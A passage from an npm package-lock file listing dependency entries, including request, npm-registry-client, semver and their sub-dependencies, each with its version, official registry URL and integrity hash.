"sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true }, "asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "requires": { "safer-buffer": "~2.1.0" } }, "assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==" }, "asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==" }, "aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "requires": { "tweetnacl": "^0.14.3" } }, "brace-expansion": { "version": "1.1.11", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", "requires": { "balanced-match": "^1.0.0", "concat-map": "0.0.1" } }, "caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true }, "combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "requires": { "delayed-stream": "~1.0.0" } }, "concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "concat-stream": { "version": "1.5.0", "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.5.0.tgz", "integrity": "sha512-litEocitzYgqQ0IPaoLw+tCHcVcJJYW05+SAhH+LS9qutSC7iuejvawts3cUYQycZbRbLsjG8mCJLQi2KX5kEw==", "requires": { "inherits": "~2.0.1", "readable-stream": "~2.0.0", "typedarray": "~0.0.5" } }, "console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "requires": { "assert-plus": "^1.0.0" } }, "delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" }, "ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "requires": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==" }, "fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==" }, "form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "requires": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" } }, "fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==" }, "gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": "sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "requires": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" } }, "getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "requires": { "assert-plus": "^1.0.0" } }, "glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "requires": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" } }, "graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "requires": { "natives": "^1.1.3" } }, "har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==" }, "har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "requires": { "ajv": "^6.12.3", "har-schema": "^2.0.0" } }, "has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": true }, "hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "requires": { "function-bind": "^1.1.2" } }, "hosted-git-info": { "version": "2.1.4", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.1.4.tgz", "integrity": "sha512-4R9eDu2ytsDMdo7nQXHrpK1347y3nu/ThXZ4tjpkUTsZnzoIIQprnPOM65c20oInjmocLuEGBIbPsesYCqibag==" }, "http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "requires": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" } }, "inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "requires": { "once": "^1.3.0", "wrappy": "1" } }, "inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "requires": { "hasown": "^2.0.0" } }, "is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true }, "is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "requires": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" } }, "mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" }, "mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "requires": { "mime-db": "1.52.0" } }, "minimatch": { "version": "3.1.2", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", "requires": { "brace-expansion": "^1.1.7" } }, "minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==" }, "mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "requires": { "minimist": "^1.2.6" } }, "natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==" }, "normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "requires": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "requires": { "hosted-git-info": "^1.5.3", "semver": "4" }, "dependencies": { "hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" } } }, "npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "requires": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "npmlog": "", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" } }, "npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "requires": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" } }, "oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" }, "once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "requires": { "wrappy": "1" } }, "path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==" }, "path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==" }, "qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" }, "readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "requires": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "requires": { "aws-sign2": "~0.7.0", "aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" } }, "resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "requires": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" } }, "retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==" }, "rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "requires": { "glob": "^7.1.3" } }, "safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==" }, "set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "signal-exit": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true }, "slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==" }, "spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "requires": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "requires": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": 